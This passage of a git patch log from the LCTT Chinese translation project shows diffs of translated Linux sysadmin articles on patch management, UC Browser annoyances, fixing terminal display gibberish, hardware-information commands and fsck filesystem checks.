+手动管理补丁的方式存在很多问题。首先,这么做会使补丁安装成为一个苦力活,安装补丁越多就需要越多人力成本,系统管理员就越可能推迟甚至完全忽略它。其次,手动管理方式依赖系统管理员凭借记忆去跟踪他或她所负责的服务器的升级情况。这非常容易导致有些服务器被遗漏而未能及时升级。 -补丁管理越快速简便,你就越可能把它做好。你应该构建一个系统,用来快速查询哪些服务器运行着特定的软件,以及这些软件的版本号,而且它最好还能够推送各种升级补丁。就个人而言,我倾向于使用 MCollective 这样的编排工具来完成这个任务,但是红帽提供的 Satellite 以及 Canonical 提供的 Landscape 也可以让你在统一的管理接口查看服务器上软件的版本信息,并且安装补丁。 +补丁管理越快速简便,你就越可能把它做好。你应该构建一个系统,用来快速查询哪些服务器运行着特定的软件,以及这些软件的版本号,而且它最好还能够推送各种升级补丁。就个人而言,我倾向于使用 MCollective 这样的编排工具来完成这个任务,但是红帽提供的 Satellite 以及 Canonical 提供的 Landscape 也可以让你在统一的管理界面上查看服务器的软件版本信息,并且安装补丁。 -补丁安装还应该具有容错能力。你应该具备在不下线的情况下为服务安装补丁的能力。这同样适用于需要重启系统的内核补丁。我采用的方法是把我的服务器划分为不同的高可用组,lb1,app1,rabbitmq1 和 db1 在一个组,而lb2,app2,rabbitmq2 和 db2 在另一个组。这样,我就能一次升级一个组,而无须下线服务。 +补丁安装还应该具有容错能力。你应该具备在不下线的情况下为服务安装补丁的能力。这同样适用于需要重启系统的内核补丁。我采用的方法是把我的服务器划分为不同的高可用组,lb1、app1、rabbitmq1 和 db1 在一个组,而lb2、app2、rabbitmq2 和 db2 在另一个组。这样,我就能一次升级一个组,而无须下线服务。 所以,多快才能算快呢?对于少数没有附带服务的软件,你的系统最快应该能够在几分钟到一小时内安装好补丁(例如 bash 的 ShellShock 漏洞)。对于像 OpenSSL 这样需要重启服务的软件,以容错的方式安装补丁并重启服务的过程可能会花费稍多的时间,但这就是编排工具派上用场的时候。我在最近的关于 MCollective 的文章中(查看 2016 年 12 月和 2017 年 1 月的工单)给了几个使用 MCollective 实现补丁管理的例子。你最好能够部署一个系统,以具备容错性的自动化方式简化补丁安装和服务重启的过程。 如果补丁要求重启系统,像内核补丁,那它会花费更多的时间。再次强调,自动化和编排工具能够让这个过程比你想象的还要快。我能够在一到两个小时内在生产环境中以容错方式升级并重启服务器,如果重启之间无须等待集群同步备份,这个过程还能更快。 -不幸的是,许多系统管理员仍坚信过时的观点,把运行时间作为一种骄傲的象征——鉴于紧急内核补丁大约每年一次。对于我来说,这只能说明你没有认真对待系统的安全性。 +不幸的是,许多系统管理员仍坚信过时的观点,把持续运行时间(uptime)作为一种骄傲的象征——鉴于紧急内核补丁大约每年一次。对于我来说,这只能说明你没有认真对待系统的安全性! 很多组织仍然使用无法暂时下线的单点故障的服务器,也因为这个原因,它无法升级或者重启。如果你想让系统更加安全,你需要去除过时的包袱,搭建一个至少能在深夜维护时段重启的系统。 @@ -41,9 +41,9 @@ Kyle Rankin 是高级安全与基础设施架构师,其著作包括: Linux H via: https://www.linuxjournal.com/content/sysadmin-101-patch-management -作者:[Kyle Rankin ][a] +作者:[Kyle Rankin][a] 译者:[haoqixu](https://github.com/haoqixu) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From d280da14beaefe0c5f28c7bfd41ac369b47007b8 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 27 Dec 2017 10:56:20 +0800 Subject: [PATCH 0805/1627] PRF&PUB:20171208 The Biggest Problems With UC Browser.md @geekpi --- .../20171208 The Biggest Problems With UC Browser.md | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) rename {translated/tech => published}/20171208 The Biggest Problems With UC Browser.md (86%) diff --git a/translated/tech/20171208 The Biggest Problems With UC Browser.md b/published/20171208 The Biggest Problems With UC Browser.md similarity index 86% rename from translated/tech/20171208 The Biggest Problems With UC Browser.md rename to published/20171208 The Biggest Problems With UC Browser.md index 636adf2b99..5a43480bf6 100644 --- a/translated/tech/20171208 The Biggest Problems With UC Browser.md +++ b/published/20171208 The Biggest Problems With UC Browser.md @@ -1,10 +1,11 @@ UC 浏览器最大的问题 ====== -在我们开始谈论缺点之前,我要確定的事实是过去 3 年来,我一直是一个忠实的 UC 浏览器用户。我真的很喜欢它的下载速度,超时尚的用户界面和工具上引人注目的图标。我一开始是 Android 上的 Chrome 用户,但我在朋友的推荐下开始使用 UC。但在过去的一年左右,我看到了一些东西让我重新思考我的选择,现在我感觉我要重新回到 Chrome。 -### 不需要的 **通知** +在我们开始谈论缺点之前,我要确定的事实是过去 3 年来,我一直是一个忠实的 UC 浏览器用户。我真的很喜欢它的下载速度,超时尚的用户界面和工具上引人注目的图标。我一开始是 Android 上的 Chrome 用户,但我在朋友的推荐下开始使用 UC。但在过去的一年左右,我看到了一些东西让我重新思考我的选择,现在我感觉我要重新回到 Chrome。 -我相信我不是唯一一个每几个小时内就收到这些不需要的通知的人。这些欺骗点击文章真的很糟糕,最糟糕的部分是你每隔几个小时就会收到一次。 +### 不需要的**通知** + +我相信我不是唯一一个每几个小时内就收到这些不需要的通知的人。这些欺骗点击的文章真的很糟糕,最糟糕的部分是你每隔几个小时就会收到一次。 [![uc browser's annoying ads notifications][1]][1] @@ -28,7 +29,7 @@ UC 浏览器在浏览器中集成了一个**音乐播放器**来播放音乐。 [![uc browser adds uc music player][4]][4] -它甚至不是在后台直接播放来自网络的音频。相反,它是一个播放离线音乐的音乐播放器。所以为什么要它?我的意思是,它甚至不够好到作为主要音乐播放器。即使它是,它不能独立于 UC 浏览器运行。所以为什么会有人运行将他/她的浏览器只是为了使用你的音乐播放器? +它甚至不是在后台直接播放来自网络的音频。相反,它是一个播放离线音乐的音乐播放器。所以为什么要它?我的意思是,它甚至没有好到可以作为主要音乐播放器。即使它足够好,它也不能独立于 UC 浏览器运行。所以为什么会有人运行将他/她的浏览器只是为了使用你的音乐播放器? ### **快速**访问栏 @@ -52,7 +53,7 @@ via: https://www.theitstuff.com/biggest-problems-uc-browser 作者:[Rishabh Kandari][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 9f55542caa7cae1287259caaf9d2fb14c5860e99 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 27 Dec 2017 11:23:42 +0800 Subject: [PATCH 0806/1627] PRF&PUB:20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md @lujun9972 --- ... on a Linux - Unix - OS X - BSD Systems.md | 76 +++++++++++++++++++ ... on a Linux - Unix - OS X - BSD Systems.md | 55 -------------- 2 files changed, 76 insertions(+), 55 deletions(-) create mode 100644 published/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md delete mode 100644 translated/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md diff --git a/published/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md b/published/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md new file mode 100644 index 0000000000..3f9ca163cb --- /dev/null +++ b/published/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md @@ -0,0 +1,76 @@ +修复 Linux / Unix / OS X / BSD 系统控制台上的显示乱码 +====== + +有时我的探索会在屏幕上输出一些奇怪的东西。比如,有一次我不小心用 `cat` 命令查看了一下二进制文件的内容 —— `cat /sbin/*`。这种情况下你将无法再访问终端里的 bash/ksh/zsh 了。大量的奇怪字符充斥了你的终端。这些字符会隐藏你输入的内容和要显示的字符,取而代之的是一些奇怪的符号。要清理掉这些屏幕上的垃圾可以使用以下方法。本文就将向你描述在 Linux/ 类 Unix 系统中如何真正清理终端屏幕或者重置终端。 + +### clear 命令 + +`clear` 命令会清理掉屏幕内容,连带它的回滚缓存区一起也会被清理掉。(LCTT 译注:这种情况下你输入的字符回显也是乱码,不必担心,正确输入后回车即可生效。) + +``` +$ clear +``` + +你也可以按下 `CTRL+L` 来清理屏幕。然而,`clear` 命令并不会清理掉终端屏幕(LCTT 译注:这句话比较难理解,应该是指的运行 `clear` 命令并不是真正的把以前显示的内容删掉,你还是可以通过向上翻页看到之前显示的内容)。使用下面的方法才可以真正地清空终端,使你的终端恢复正常。 + +### 使用 reset 命令修复显示 + +下面图片中,控制台的屏幕上充满了垃圾信息: + +[![Fig.01:Bash fix the display][1]][2] + +要修复正常显示,只需要输入 `reset` 命令。它会为你再初始化一次终端: + +``` +$ reset +``` + +或者: + +``` +$ tput reset +``` + +如果 `reset` 命令还不行,那么输入下面命令来让绘画回复到正常状态: + +``` +$ stty sane +``` + +按下 `CTRL + L` 来清理屏幕(或者输入 `clear` 命令): + +``` +$ clear +``` + +### 使用 ANSI 转义序列来真正地清空 bash 终端 + +另一种选择是输入下面的 ANSI 转义序列: + +``` +clear +echo -e "\033c" +``` + +下面是这两个命令的输出示例: + +[![Animated gif 01:Fix Unix Console Gibberish Command Demo][3]][4] + +更多信息请阅读 `stty` 和 `reset` 的 man 页: stty(1),reset(1),bash(1)。 + + +-------------------------------------------------------------------------------- + +via: https://www.cyberciti.biz/tips/bash-fix-the-display.html + +作者:[Vivek Gite][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.cyberciti.biz +[1]:https://www.cyberciti.biz/media/new/tips/2006/08/bash-fix-terminal.png +[2]:https://www.cyberciti.biz/media/uploads/tips/2006/08/bash-fix-terminal.png +[3]:https://www.cyberciti.biz/media/new/tips/2006/08/unix-linux-console-gibberish.gif +[4]:https://www.cyberciti.biz/tips/bash-fix-the-display.html/unix-linux-console-gibberish diff --git a/translated/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md b/translated/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md deleted file mode 100644 index 285b3fe935..0000000000 --- a/translated/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md +++ /dev/null @@ -1,55 +0,0 @@ -修复 Linux / Unix / OS X / BSD 系统 控制台上的显示垃圾 -====== -有时我的 R & D( 研究与发展??) 会在屏幕上输出一些奇怪的东西。比如,有一次我不小心用 cat 命令查看了一下二进制文件的内容 - `cat /sbin/*`。这种情况下你将无法再访问终端里的 bash/ksh/zsh 了。大量的奇怪字符充斥了你的终端 y。这些字符会隐藏你输入的内容和要显示的字符,取而代之的是一些奇怪的符号。要清理掉这些屏幕上的垃圾可以使用以下方法。本文就将向你描述在 Linux/ 类 Unix 系统中如何真正清理终端屏幕或者重置终端。 - - -## clear 命令 - -clear 命令会清理掉屏幕内容,连带它的回滚缓存区一起也会被清理掉。 -`$ clear` -你也可以按下 `CTRL+L` 来清理屏幕。然而,clear 命令并不会清理掉终端屏幕(译者注:这句话比较难理解,应该是指的运行 clear 命令并不是真正的把以前显示的内容删掉,你还是可以通过向上翻页看到之前显示的内容)。使用下面的方法才可以真正地清空终端,使你的终端恢复正常。 - -## 使用 reset 命令修复显示 - -下面图片中,控制台的屏幕上充满了垃圾信息: -[![Fig.01:Bash fix the display][1]][2] - -要修复正常显示,只需要输入 `reset` 命令。它会为你再初始化一次终端: -`$ reset` -或者 -`$ tput reset` - -如果 `reset` 命令还不行,那么输入下面命令来让绘画回复到正常状态: -`$ stty sane` - -按下 `CTRL + L` 来清理屏幕 (或者输入 clear 命令): -`$ clear` - -## 使用 ANSI 转义序列来真正地晴空 bash 终端 - -另一种选择是输入下面的 ANSI 转义序列: -``` -clear -echo -e "\033c" -``` - -下面是这两个命令的输出示例: -[![Animated gif 01:Fix Unix Console Gibberish Command Demo][3]][4] -更多信息请阅读 stty 和 reset 的 man 页 stty(1),reset(1),bash(1) - - --------------------------------------------------------------------------------- - -via: https://www.cyberciti.biz/tips/bash-fix-the-display.html - -作者:[Vivek Gite][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.cyberciti.biz -[1]:https://www.cyberciti.biz/media/new/tips/2006/08/bash-fix-terminal.png -[2]:https://www.cyberciti.biz/media/uploads/tips/2006/08/bash-fix-terminal.png -[3]:https://www.cyberciti.biz/media/new/tips/2006/08/unix-linux-console-gibberish.gif -[4]:https://www.cyberciti.biz/tips/bash-fix-the-display.html/unix-linux-console-gibberish From a49dd016428b6e1c2e2d58cadd01997586d7cb6f Mon Sep 17 00:00:00 2001 From: geekpi Date: Wed, 27 Dec 2017 14:16:06 +0800 Subject: [PATCH 0807/1627] translated --- ... to check System & Hardware Information.md | 98 ------------------- ... to check System & Hardware Information.md | 95 ++++++++++++++++++ 2 files changed, 95 insertions(+), 98 deletions(-) delete mode 100644 sources/tech/20170515 Commands to check System & Hardware Information.md create mode 100644 translated/tech/20170515 Commands to check System & Hardware Information.md diff --git a/sources/tech/20170515 Commands to check System & Hardware Information.md b/sources/tech/20170515 Commands to check System & Hardware Information.md deleted file mode 100644 index 317b3cb538..0000000000 --- a/sources/tech/20170515 Commands to check System & Hardware Information.md +++ /dev/null @@ -1,98 +0,0 @@ -translating---geekpi - -Commands to check System & Hardware Information -====== -Hello linux-fanatics, in this post i will be discussing some important that will make your life as System Administrator. As we all know being a good System Administrator means knowing everything about your IT Infrastructure & having all the information about your servers, whether its hardware or OS. So following commands will help you out in extracting out all the hardware & system information. - -#### 1- Viewing system information - -$ uname -a - -![uname command][2] - -It will provide you all the information about your system. It will provide you with Kernel name of system, Hostname, Kernel version, Kernel Release, Hardware name. - -#### 2- Viewing Hardware information - -$ lshw - -![lshw command][4] - -Using lshw will show you all the Hardware information on your screen. - -#### 3- Viewing Block Devices(Hard disks, Flash drives) information - -$ lsblk - -![lsblk command][6] - -lsblk command prints all the information regarding block devices on screen. Use lsblk -a to show all the block devices. - -#### 4- Viewing CPU information - -$ lscpu - -![lscpu command][8] - -lscpu shows all the CPU information on screen. - -#### 5- Viewing PCI information - -$ lspci - -![lspci command][10] - -All the network adapter cards, USB cards, Graphics cards are termed as PCIs. To view their information use lspci . - -lspci -v will give detailed information regarding PCI cards. - -lspci -t will show them in tree format. - -#### 6- Viewing USB information - -$ lsusb - -![lsusb command][12] - -To view information regarding all USB controllers & devices connected to them, we use lsusb - -#### 7- Viewing SCSI information - -$ lssci - -![lssci][14] - -To view SCSI information type lsscsi. lsscsi -s will also show the size of partition. - -#### 8- Viewing file system information - -$ fdisk -l - -![fdisk command][16] - -Using fdisk -l will show information regarding the file system. Although main function of fdisk utility is to modify a file system, you can create new partitions, delete old ones ( more on that in my future tutorial). - -That's it for now my fellow Linux-fanatics . You are advised to check out my other posts regarding Linux commands **[HERE][17] & ** another one **[HERE][18] -** - --------------------------------------------------------------------------------- - -via: http://linuxtechlab.com/commands-system-hardware-info/ - -作者:[Shusain][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://linuxtechlab.com/author/shsuain/ -[2]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/uname.jpg?resize=664%2C69 -[4]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lshw.jpg?resize=641%2C386 -[6]:https://i1.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lsblk.jpg?resize=646%2C162 -[8]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lscpu.jpg?resize=643%2C216 -[10]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lspci.jpg?resize=644%2C238 -[12]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lsusb.jpg?resize=645%2C37 -[14]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lsscsi.jpg?resize=639%2C110 -[16]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/fdisk.jpg?resize=656%2C335 -[17]:http://linuxtechlab.com/linux-commands-beginners-part-1/ -[18]:http://linuxtechlab.com/linux-commands-beginners-part-2/ diff --git a/translated/tech/20170515 Commands to check System & Hardware Information.md b/translated/tech/20170515 Commands to check System & Hardware Information.md new file mode 100644 index 0000000000..e8469797c6 --- /dev/null +++ b/translated/tech/20170515 Commands to check System & Hardware Information.md @@ -0,0 +1,95 @@ +检查系统和硬件信息的命令 +====== +你们好,linux 爱好者们,在这篇文章中,我将讨论一些作为系统管理员重要的事。众所周知,作为一名优秀的系统管理员意味着要了解有关 IT 基础架构的所有信息,并掌握有关服务器的所有信息,无论是硬件还是操作系统。所以下面的命令将帮助你了解所有的硬件和系统信息。 + +#### 1- 查看系统信息 + +$ uname -a + +![uname command][2] + +它会为你提供有关系统的所有信息。它会为你提供系统的内核名、主机名、内核版本、内核发布号、硬件名称。 + +#### 2- 查看硬件信息 + +$ lshw + +![lshw command][4] + +使用 lshw 将在屏幕上显示所有硬件信息。 + +#### 3- 查看块设备(硬盘、闪存驱动器)信息 + +$ lsblk + +![lsblk command][6] + +lsblk 命令在屏幕上打印关于块设备的所有信息。使用 lsblk -a 显示所有块设备。 + +#### 4- 查看 CPU 信息 + +$ lscpu + +![lscpu command][8] + +lscpu 在屏幕上显示所有 CPU 信息。 + +#### 5- 查看 PCI 信息 + +$ lspci + +![lspci command][10] + +所有的网络适配器卡、USB 卡、图形卡都被称为 PCI。要查看他们的信息使用 lspci。 + +lspci -v 将提供有关 PCI 卡的详细信息。 + +lspci -t 会以树形格式显示它们。 + +#### 6- 查看 USB 信息 + +$ lsusb + +![lsusb command][12] + +要查看有关连接到机器的所有 USB 控制器和设备的信息,我们使用 lsusb。 + +#### 7- 查看 SCSI 信息 + +$ lssci + +![lssci][14] + +要查看 SCSI 信息输入 lsscsi。lsscsi -s 会显示分区的大小。 + +#### 8- 查看文件系统信息 + +$ fdisk -l + +![fdisk command][16] + +使用 fdisk -l 将显示有关文件系统的信息。虽然 fdisk 的主要功能是修改文件系统,但是也可以创建新分区,删除旧分区(详情在我以后的教程中)。 + +就是这些了,我的 Linux 爱好者们。建议你在**[这里][17]**和**[这里][18]**查看我文章中关于另外的 Linux 命令。 + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/commands-system-hardware-info/ + +作者:[Shusain][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[2]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/uname.jpg?resize=664%2C69 +[4]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lshw.jpg?resize=641%2C386 +[6]:https://i1.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lsblk.jpg?resize=646%2C162 +[8]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lscpu.jpg?resize=643%2C216 +[10]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lspci.jpg?resize=644%2C238 +[12]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lsusb.jpg?resize=645%2C37 +[14]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lsscsi.jpg?resize=639%2C110 +[16]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/fdisk.jpg?resize=656%2C335 +[17]:http://linuxtechlab.com/linux-commands-beginners-part-1/ +[18]:http://linuxtechlab.com/linux-commands-beginners-part-2/ From 002d0ada16bf5c3659e1c411b72f7c4e45dfcd38 Mon Sep 17 00:00:00 2001 From: geekpi Date: Wed, 27 Dec 2017 14:20:03 +0800 Subject: [PATCH 0808/1627] translating --- ...1219 4 Easiest Ways To Find Out Process ID (PID) In Linux.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171219 4 Easiest Ways To Find Out Process ID (PID) In Linux.md b/sources/tech/20171219 4 Easiest Ways To Find Out Process ID (PID) In Linux.md index 75ec42c268..14d561e766 100644 --- a/sources/tech/20171219 4 Easiest Ways To Find Out Process ID (PID) In Linux.md +++ b/sources/tech/20171219 4 Easiest Ways To Find Out Process ID (PID) In Linux.md @@ -1,3 +1,5 @@ +translating---geekpi + 4 Easiest Ways To Find Out Process ID (PID) In Linux ====== Everybody knows about PID, Exactly what is PID? Why you want PID? What are you going to do using PID? Are you having the same questions on your mind? If so, you are in the right place to get all the details. From d137c0977facb60b55116ba150748254bee32913 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 15:03:24 +0800 Subject: [PATCH 0809/1627] =?UTF-8?q?translate=20done=20at=202017=E5=B9=B4?= =?UTF-8?q?=2012=E6=9C=88=2027=E6=97=A5=20=E6=98=9F=E6=9C=9F=E4=B8=89=2015?= =?UTF-8?q?:03:24=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... for errors- FSCK command with examples.md | 137 --------------- ... for errors- FSCK command with examples.md | 159 ++++++++++++++++++ 2 files changed, 159 insertions(+), 137 deletions(-) delete mode 100644 sources/tech/20171226 Check Linux filesystem for errors- FSCK command with examples.md create mode 100644 translated/tech/20171226 Check Linux filesystem for errors- FSCK command with examples.md diff --git a/sources/tech/20171226 Check Linux filesystem for errors- FSCK command with examples.md b/sources/tech/20171226 Check Linux filesystem for errors- FSCK command with examples.md deleted file mode 100644 index d20e862c88..0000000000 --- a/sources/tech/20171226 Check Linux filesystem for errors- FSCK command with examples.md +++ /dev/null @@ -1,137 +0,0 @@ -translating by lujun9972 -Check Linux filesystem for errors: FSCK command with examples -====== -FSCK is a very important Linux/Unix utility, it is used to check & repair the errors in the file system. It is similar to 'chkdsk' utility in Windows operating systems. It is available for Linux, MacOS, FreeBSD operating systems. - -FSCK stands for File System Consistency Check & most of the times, it runs at boot time but can also be started manually by super user, if need arises. - -It can be used with 3 modes of operation, - - **1-** Check for errors & let the user decide what should be done with each error, - - **2-** Check for errors & make repairs automatically, or, - - **3-** Check for errors & display the error but does not perform any repairs. - - **(Recommended Read:[Learn to use TCPDUMP command with examples][1])** - -### Syntax for using FSCK - -We can use the FSCK command manually with the following syntax, - - **$ fsck options drives** - -The options that can be used with fsck command are, - - **-p ** Automatic repair (no questions) - - **-n** Make no changes to the filesystem - - **-y ** Assume "yes" to all questions - - **-c** Check for bad blocks and add them to the badblock list - - **-f ** Force checking even if filesystem is marked clean - - **-v ** Be verbose - - **-b ** superblock Use alternative superblock - - **-B** blocksize Force blocksize when looking for superblock - - **-j ** external_journal Set location of the external journal - - **-l ** bad_blocks_file Add to badblocks list - - **-L ** bad_blocks_file Set badblocks list - -We can use any of the following options, depending on the operation we need to perform. Let's discuss some of the options of fsck command with examples. - -### Fsck command with examples - - **Note:-** Before we discuss any examples, please read this. We should not be using FSCK on mounted drives, as there will be high chances that fsck on mounted drive wll damage the drive permanently. So before performing fsck, we must un-mount the drive with the following command, - - **$ umount drivename** - -For example, - - **$ umount /dev/sdb1** - -You can check the partition number with the following command, - - **$ fdisk -l** - -Also while running the fsck, we might get some error codes. Below mentioned is the list of error codes that we might get along with their meanings, - - **0** - No errors -**1** - Filesystem errors corrected -**2** - System should be rebooted -**4** - Filesystem errors left uncorrected -**8** - Operational error -**16** - Usage or syntax error -**32** - Fsck canceled by user request -**128** - Shared-library error - -Now let's discuss usage of fdisk command with examples, - -### Perform an error check on a single partition - -To perform a file check on a single partition, run the following command from the terminal, - - **$ umount /dev/sdb1** - - **$ fsck /dev/sdb1** - -### Check filesystem for errors & repair them automatically - -Run the fsck command with 'a' option to perform consistency check & to repair them automatically, execute the following command. We can also use 'y' option in place of option 'a'. - - **$ fsck -a /dev/sdb1** - -### Check filesystem for errors but don't repait them - -In case we only need to see the error that are occurring on our file system & dont need to repair them, than we should run fsck with option 'n', - - **$ fsck -n /dev/sdb1** - -### Perform an error check on all partitions - -To perform a filesystem check for all partitions in single go, use fsck with 'A' option, - - **$ fsck -A** - -To disable the root file system check, we will use the option 'R' - - **$ fsck -AR** - -### Check only partition with mentioned filesystem - -In order to run fsck on all the partitiions with mentioned filesystem type, for example 'ext4', use fsck with option 't' followed by filesystem type, - - **$ fsck -t ext4 /dev/sdb1** - -or - - **$ fsck -t -A ext4** - -### Perform consistency check only on unmounted drives - -To make sure that the fsck is performed only on unmounted drives, we will use option 'M' while running fsck, - - **$ fsck -AM** - -This was our tutorial on fsck command with examples. Please feel free to send in your questions or queries to us, using the comment box below. - - --------------------------------------------------------------------------------- - -via: http://linuxtechlab.com/linux-filesystem-errors-fsck-command-with-examples/ - -作者:[Shusain][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://linuxtechlab.com/author/shsuain/ -[1]:http://linuxtechlab.com/learn-use-tcpdump-command-examples/ diff --git a/translated/tech/20171226 Check Linux filesystem for errors- FSCK command with examples.md b/translated/tech/20171226 Check Linux filesystem for errors- FSCK command with examples.md new file mode 100644 index 0000000000..c937b6691b --- /dev/null +++ b/translated/tech/20171226 Check Linux filesystem for errors- FSCK command with examples.md @@ -0,0 +1,159 @@ +检查 Linux 文件系统中的错误:通过案例学习 FSCK 命令 +====== +FSCK 是一个很重要的 Linux/Unix 工具,它用于检测并修复文件系统中的错误。它类似于 Windows 操作系统中的 'chkdsk' 工具,但是是为 Linux,MacOS,FreeBSD 操作系统所准备的。 + +FSCK 全称为 File System Consistency Check。在大多数时候,它在系统启动时运行,但是如果需要的话,它也能被超级用户手工启动。 + +它可以进行三种模式的操作, + + **1-** 查错并在发现错误时由用户决定如何处理, + + **2-** 查错并自动修复,以及, + + **3-** 查错但在发现错误时只显示错误而不进行修复。 + + **(推荐阅读:[通过案例学习 TCPDUMP 命令 ][1])** + +### FSCK 的语法 + +手工执行 FSCK 的语法为, + +``` + $ fsck options drives +``` + +fsck 支持的选项有, + + **-p ** 自动修复(不询问) + + **-n ** 不对文件系统做出改动 + + **-y ** 多有所问题都回答 "yes" + + **-c ** 检查所有的坏块并将之添加到坏块列表中 + + **-f ** 即使文件系统标记为 clean 也强制进行检查 + + **-v ** 输出详细信息 + + **-b ** superblock 使用替代的超级块 + + **-B ** blocksize 指定超级块的块大小 + + **-j ** external_journal 指定外部日志的位置 + + **-l ** bad_blocks_file 添加到指定的坏块列表(文件) + + **-L ** bad_blocks_file 指定坏块列表(文件) + +我们可以根据要做的操作任意指定这些选项。下面让我们来看一些例子。 + +### Fsck 命令的案例 + + **注意:-** 在开始讨论案例之前,请先读完这段话。我们不应用 FSCK 检查已挂载的磁盘,这很可能会对磁盘造成永久性的伤害。因此在开始使用 fsck 之前,我们需要使用下面命令来卸载磁盘, + +``` +$ umount drivename +``` + +比如像这样, + +``` +$ umount /dev/sdb1 +``` + +可以通过下面命令来查看分区编号, + +``` +$ fdisk -l +``` + +另外,在运行 fsck 时,可能出错并返回一些错误码。下面是一些常见的错误及其意义的列表, + +**0** - 没有错误 +**1** - 修复了一些文件系统错误 +**2** - 系统需要被重启 +**4** - 文件系统错误未被修复 +**8** - 操作错 +**16** - 使用或语法错 +**32** - Fsck 被用户取消 +**128** - 共享库出错 + +现在让我们来看一些 fsck 命令的例子, + +### 在单个分区上进行错误检查 + +在终端运行下面过命令来对单个分区进行检查,run the following command from the terminal, + +``` +$ umount /dev/sdb1 +$ fsck /dev/sdb1 +``` + +### 检查文件系统错误并自动修复 + +使用选项 ‘a’ 进行一致性检查并会自动修复这些错误。也可以用 'y' 替代 'a' 选项。 + +``` +$ fsck -a /dev/sdb1 +``` + +### 检查文件系统错误但并不进行修复 + +若我们只想知道文件系统上有哪些错误而不想修复这些错误,那么可以使用选项 'n', + +``` +$ fsck -n /dev/sdb1 +``` + +### 检查所有分区中的错误 + +'A' 选项一次性检查所有分区上的文件系统错误, + +``` +$ fsck -A +``` + +若要禁止检查对根进行检查可以使用选项 'R' + +``` +$ fsck -AR +``` + +### 只检查指定文件系统类型的分区 + +使用选项 ‘t’ 跟上文件系统类型,可以让 fsck 只检查指定文件系统类型的分区,比如指定文件系统类型为 'ext4', + +``` +$ fsck -t ext4 /dev/sdb1 +``` + +或者 + +``` +$ fsck -t -A ext4 +``` + +### 只在卸载的磁盘上进行一致性检查 + +要保证 fsck 只在卸载的磁盘上操作,可以使用选项 'M', + +``` +$ fsck -AM +``` + +这就是我们的案例教程了。有任何疑问欢迎在下面的留言框中留言。 + + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/linux-filesystem-errors-fsck-command-with-examples/ + +作者:[Shusain][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1]:http://linuxtechlab.com/learn-use-tcpdump-command-examples/ From 75e7cdbd8e4721c500c229cd17b703696983a773 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 27 Dec 2017 15:12:58 +0800 Subject: [PATCH 0810/1627] 